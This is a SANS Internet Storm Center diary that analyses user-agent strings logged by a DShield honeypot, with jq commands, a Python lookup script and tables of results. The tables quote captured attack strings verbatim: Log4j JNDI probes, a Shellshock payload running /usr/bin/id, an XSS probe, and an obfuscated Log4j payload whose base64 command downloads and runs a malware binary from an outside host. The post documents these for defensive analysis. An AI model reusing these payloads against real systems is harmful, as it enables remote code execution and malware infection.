What is that User Agent?, (Mon, Jan 8th)

Category :

SANS Full Feed

Posted On :

Devices are connecting to different web resources on a regular basis. One method to identify what is connecting to a web resource is through a user agent [1] and many are received on DShield [2] honeypots.

 

Figure 1: Popular user agents seen over the last 7 days from a honeypot

 

Some of these user agents are easier to understand than others. They can indicate the version of software used to connect to the web resource and, as seen in the example above, indicate access attempts from researchers.

 

Translating User Agent Strings

There are many resources to help and give human readible information on what these user agent strings indicate. Many allow for manual submission, but to save some time and effort, I wanted to automate this process. I decided to use an API through WhatIsMyBrowser [3] to gather data from user agents collected by one of my honeypots. First, I needed to gather the user agents that I have seen from my honeypot. and ‘jq’ was the tool I decided to use for a quick text export.

# read all web honeypot lots from my archival location
# default storage location for these logs is /srv/db/ on a DShield honeypot
# cat /logs/webhoneypot*.json

# select any user agent values where the value is not blank
# jq -r ‘select(.useragent!=””)’

# get raw user agent values (without quotes) and output to a text file
# jq -r .useragent[] > all_user_agents_historic.txt

cat /logs/webhoneypot*.json | jq -r ‘select(.useragent!=””)’ | jq -r .useragent[] > all_user_agents_historic.txt

 

Now that I have all my user agents, I put together a short python script to process the data.

import requests
import json
from collections import Counter

def get_user_agents(file):
unique_user_agents = set()
all_headers = []
filehandle = open(file, “r”)
for line in filehandle.readlines():
unique_user_agents.add(line.replace(“n”, “”))
all_headers.append(line.replace(“n”, “”))
return all_headers, unique_user_agents

def get_post_data(user_agent):
header = []
header.append({
“name”: “USER_AGENT”,
“value”: user_agent,
})
return header

def request_user_agent_data(header):
headers = {
‘X-API-KEY’: “<redacted>”,
}

post_data = {
“headers”: header,
}

result = requests.post(“https://api.whatismybrowser.com/api/v3/detect”, data=json.dumps(post_data), headers=headers)
save_results(result.text, “results.json”)
try:
save_results(
str(header_counts[header[0][“value”]]) + “|” +
result.json().get(“detection”).get(“simple_software_string”) + “|” +
header[0][“value”], “basic_results.csv”
)
except:
save_results(
str(header_counts[header[0][“value”]]) + “|” +
“No results found” + “|” +
header[0][“value”], “basic_results.csv”
)

def save_results(result, filename):
filehandle = open(filename, “a”)
filehandle.write(result + “n”)
filehandle.close()

def process_headers(header_list):
for each_header in header_list:
request_user_agent_data(get_post_data(each_header))

all_headers, headers_to_send = get_user_agents(“all_user_agents_historic.txt”)
header_counts = Counter(all_headers)

process_headers(headers_to_send)

 

Some of this was based on example code documentation [4]. I ran into some issues submitting all of the headers in one request. Instead, this submits all of the unique user agents one at a time and saves the results to a couple files:

basic_results.csv –> Bar (“|”) delimited text file containing number of times the user agent was seen, translated user agent, raw user agent
results.json –> raw results from every request

There are definitely some efficiencies to be made with the code, but it gave me what I was looking for.

 

User Agents Seen on a DShield Honeypot

Before going into some of the specific user agents, some information about the data used:

Time period of data
8/3/2023 – 1/5/2024
(approximately 5 months of data)

Number of user agent strings
7,540,306

Number of unique user agent strings
1,181

Figure 2: Summary of data used for analysis

 

Most Common User Agents

Count
Translated User Agent
Raw User Agent

2303996
Firefox 22 on Windows 7
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:22.0) Gecko/20100101 Firefox/22.0

1702751
Firefox 93 on Windows 10
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0

250183
Chrome 81 on Linux
Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36

170996
Chrome 117 on Windows 10
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36

157401
Internet Explorer 7 on Windows Vista
Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 6.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)

138207
Firefox 60 on Windows 10
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0

134014
Go Http Client 1.1
Go-http-client/1.1

121178
Chrome 109 on Windows 10
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36

112378
ZGrab 0.x
Mozilla/5.0 zgrab/0.x

110627
Chrome 116 on Windows 10
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36

Figure 3: Top 10 most common user agents seen on a DShield honeypot

 

The “translated user agent” is much easier to understand. The most popular user agent seen is for Windows 7 using Firefox 22. Windows 7 support ended in January of 2020 and Firefox 22 was released in 2013. This could either be a very old and outdated device, that also may be compromised, or it is a falsified user agent string. To better understand what hosts are using this specific user agent string, I can take a look at the raw data.

The data used for this search was only the last 7 days.

# read web honeypot json files
# cat /logs/webhoneypot*.json

# search for values that do not have a blank user agent
# jq -r ‘select(.useragent!=””)’

# search for our specific user agent string (Windows 7, Firefox 22)
# jq -r ‘select(.useragent[]==”Mozilla/5.0 (Windows NT 6.1; WOW64; rv:22.0) Gecko/20100101 Firefox/22.0″)’

# output the source IPs, sorted by the number of times the source IP was seen
# jq -r .sip | sort | uniq -c | sort -n

cat /logs/webhoneypot*.json | jq -r ‘select(.useragent!=””)’ | jq -r ‘select(.useragent[]==”Mozilla/5.0 (Windows NT 6.1; WOW64; rv:22.0) Gecko/20100101 Firefox/22.0″)’ | jq -r .sip | sort | uniq -c | sort -n

831351 80.243.171.172

 

This user agent has only been coming from %%ip:80.243.171.172%% in the last week. Are there any other user agents that this particular IP is using?

cat /logs/webhoneypot*.json | jq -r ‘select(.useragent!=””)’ | jq ‘select(.sip==”80.243.171.172″)’ | jq -r .useragent[] | sort | uniq -c | sort -n
2 QualysGuard
116 Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.18) Gecko/2010020220 Firefox/3.0.18 (.NET CLR 3.5.30729);
185 ${jndi:nis://10.10.11.42:42643/QUALYSTEST}
207 ZX-80 SPECTRUM
263 ${jndi:corba://10.10.11.42:35625/QUALYSTEST}
439 ${jndi:http://10.10.11.42:43608/QUALYSTEST}
457 Java/1.8.0_102
496 Java/1.8.0_161
528 Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
769 Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
892 curl/7.55.1
964 ${jndi:ldap://10.10.11.42:37161/QUALYSTEST}
1017 ${jndi:ldaps://10.10.11.42:33141/QUALYSTEST}
1069 ${jndi:nds://10.10.11.42:43608/QUALYSTEST}
1105 ${jndi:ldaps://10.10.11.42:42091/QUALYSTEST}
1368 ${jndi:dns://10.10.11.42:42643/QUALYSTEST}
1500 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
1525 ${jndi:iiop://10.10.11.42:35625/QUALYSTEST}
1669 ${jndi:rmi://10.10.11.42:42091/QUALYSTEST}
1791 ${jndi:nis://10.10.11.42:45742/QUALYSTEST}
2653 ${jndi:rmi://10.10.11.42:33141/QUALYSTEST}
2794 Mozilla/5.0 (Windows NT 6.1; WOW64; rv:22.0) Gecko/20100101
3062 ${jndi:dns://10.10.11.42:45742/QUALYSTEST}
3253 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.199 Safari/537.36
3305 Node.js
3642 Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
3805 Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
3862 : Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
3875 Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
3889 Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0
4115 Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
4374 Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.117 Safari/537.36
4467 Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
4475 Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
4596 Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
4615 Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0
4625 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:53.0) Gecko/20100101 Firefox/53.0
4868 Gecko/20100914
4894 Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.16) Gecko/20110319 Firefox/3.6.16
5036 Mozilla/5.0 (Windows NT 6.1; rv:60.0) Gecko/20100101 Firefox/60.0
5222 () { ignored; }; echo Content-Type: text/plain ; echo ; echo ; /usr/bin/id
5612 Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0
6442 curl/7.29.0
6652 gSOAP/2.8
6729 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:66.0) Gecko/20100101 Firefox/66.0
7534 Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14)
7721 Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
8052 Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
8073 Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
8230 Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101
8644 curl/7.60.0
8649 Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0
8819 Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0
9145 Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
9326 Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0
9853 Mozilla/5.0
10708 <script>alert(Qualys)</script>
12703 curl/7.47.0
13541 Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:46.0) Gecko/20100101 Firefox/46.0
13746 Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0
15824 Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0
17642 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:59.0) Gecko/20100101 Firefox/59.0
18622 Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0
19283 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
19708 Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.18) Gecko/2010020220 Firefox/3.0.18 (.NET CLR 3.5.30729)
22817 Mozilla/5.0 (Windows NT 10.0; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0
32794 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
39371 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR 1.1.4322)
40764 Mozilla/5.0 (X11; Linux i686; rv:52.0) Gecko/20100101 Firefox/52.0
74931 Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
93445 Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0
831351 Mozilla/5.0 (Windows NT 6.1; WOW64; rv:22.0) Gecko/20100101 Firefox/22.0
864153 Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0

 

Based on the data, it looks like this might be a Qualys scan [5]. Using different agent strings to access web resources can be particularly helpful to determine vulnerabilities and work around security controls. For example, some websites may block accss to their resources if using an automated tool like curl. However, this can be easily circumvented [6]. 

 

Least Common User Agents

Count
Translated User Agent
Raw User Agent

1
Chrome 92 on Android 11
Mozilla/5.0 (Linux; Android 11; ONEPLUS A6000) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Mobile Safari/537.36

1
Chrome 56 on Windows 8
Mozilla/5.0 (Windows NT 6.2;en-US) AppleWebKit/537.32.36 (KHTML, live Gecko) Chrome/56.0.3037.63 Safari/537.32

1
Safari 10 on Mac OS X (Yosemite)
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/600.8.9 (KHTML, like Gecko) Version/10.0 Safari/602.1.50

1
Chromium 75 on Ubuntu Linux
Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/75.0.3770.142 Chrome/75.0.3770.142 Safari/537.36

1
Chrome 72 on Windows 10
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.81 Safari/537.36

1
No results found
t(‘${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//193.111.248[.]104:2213/TomcatBypass/Command/Base64
/d2dldCAtTyAvdG1wL3BhcmFpc28ueDg2IGh0dHA6Ly91cGRhdGUuZXRlcm5pdHlzdHJlc3Nlci54eXovZG93bmxvYWQvYmlu
cy9wYXJhaXNvLng4NiA7IGN1cmwgLW8gL3RtcC9wYXJhaXNvLng4NiBodHRwOi8vdXBkYXRlLmV0ZXJuaXR5c3RyZXNzZXIue
Hl6L2Rvd25sb2FkL2JpbnMvcGFyYWlzby54ODYgOyBjaG1vZCAreCAvdG1wL3BhcmFpc28ueDg2IDsgY2htb2QgNzc3IC90bX
AvcGFyYWlzby54ODYgOyAvdG1wL3BhcmFpc28ueDg2IHg4NiA7IHJtIC1yZiAvdG1wL3BhcmFpc28ueDg2}’)

1
Edge 118 on Android 11
Mozilla/5.0 (Linux; Android 11; Pixel 5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.4430.91 Mobile Safari/537.36 Edg/118.0.0.0

1
Chrome 101 on Windows 10
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.67 Safari/537.36

1
Chrome 19 on iOS 5.1
Mozilla/5.0 (iPhone; U; CPU iPhone OS 5_1_1 like Mac OS X; da-dk) AppleWebKit/534.46.0 (KHTML, like Gecko) CriOS/19.0.1084.60 Mobile/9B206 Safari/7534.48.3

1
Android Browser 3.1 on Android (Cupcake)
HTC_Dream Mozilla/5.0 (Linux; U; Android 1.5; en-ca; Build/CUPCAKE) AppleWebKit/528.5  (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1

Figure 4: Top 10 least common user agents seen on a DShield honeypot

 

These results indicate a user agent that was not found through the API. These items were listed as “No results found”. This looks like a Log4j attack, attempting to download a payload from %%ip:193.111.248%% on port %%port:2213%%. Any items that did not have a result could be a good place to look for customized user agents and attacks.

 

User Agents Not Found

Count
Translated User Agent
Raw User Agent

53175
No results found
‘Cloud mapping experiment. Contact [email protected]

38409
No results found
Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: [email protected]

15048
No results found
gSOAP/2.8

14492
No results found
<script>alert(Qualys)</script>

12540
No results found
Hello World

9009
No results found
() { ignored; }; echo Content-Type: text/plain ; echo  ; echo ; /usr/bin/id

6929
No results found
Gecko/20100914

5170
No results found
Node.js

4612
No results found
Sun Web Console Fingerprinter/7.15

3062
No results found
${jndi:dns://10.10.11.42:45742/QUALYSTEST}

Figure 5: Top 10 most common user agents without a translated match, seen on a DShield honeypot

 

There are indications of research scans, vulneability scans, web attacks and perhaps some user agents that simply aren’t defined yet in the resource that was used. Taking out any of the Log4j attacks and a couple derogatory items, these were the user agents without any results found:

<script>alert(Qualys)</script>
A
Abcd
abuse.xmco[.]fr
Adobe Application Manager 2.0
asusrouter–
‘Cloud mapping experiment. Contact research@pdrlabs[.]net’
Dark
DoCoMo/2.0 SH901iC(c100;TB;W24H12)
Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks[.]com
fasthttp
Gecko/20100914
gSOAP/2.8
hacked-by-matrix
Hello World
Hello World/1.0
Hello, world
Hello, World
https://aff[.]rip/?affiliate_id=9345&keyword=tech+discord+server
https://affgate[.]top/landing/aff/
https://discordservers[.]su/
Kryptos Logic Telltale – telltale.kryptoslogic[.]com
l9tcpid/v1.1.0
masscan/1.0 (https://github[.]com/robertdavidgraham/masscan)
masscan/1.3 (https://github[.]com/robertdavidgraham/masscan)
masscan-ng/1.3 (https://github[.]com/bi-zone/masscan-ng)
Microsoft URL Control – 6.00.8862
MOT-L7v/08.B7.5DR MIB/2.2.1 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Link/6.3.0.0.0
Mozila/5.0
nekololis-owned-you
Node.js
NukeBotC2
Offline Explorer/2.5
pOrT.sCaNnInG.iS.nOt.A.cRiMe
QualysGuard
r00ts3c-owned-you
SEC-SGHX210/1.0 UP.Link/6.3.1.13.0
Sun Web Console Fingerprinter/7.15
t.me/DeltaApi
the beast
WDG_Validator/1.6.2
WebCopier v4.6
webprosbot/2.0 (+mailto:abuse-6337@webpros[.]com)
WebZIP/3.5 (http://www.spidersoft[.]com)
Xenu Link Sleuth/1.3.8
xfa1
ZX-80 SPECTRUM

Any of these user agents would be interesting to look into in more depth. Understanding the user agent strings accessing web resources can help to uncover suspicious activity. In addition, understanding the user agents coming from your network can also help uncover applications that reside on devices and the devices themselves.

Figure 6: User agents identifying a Roku TV

 

[1] https://en.wikipedia.org/wiki/User_agent
[2] https://isc.sans.edu/honeypot.html
[3] https://developers.whatismybrowser.com/api/
[4] https://developers.whatismybrowser.com/api/docs/v3/sample-code/python/detect/
[5] https://www.qualys.com/apps/web-app-scanning/
[6] https://phoenixnap.com/kb/curl-user-agent


Jesse La Grew
Handler

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.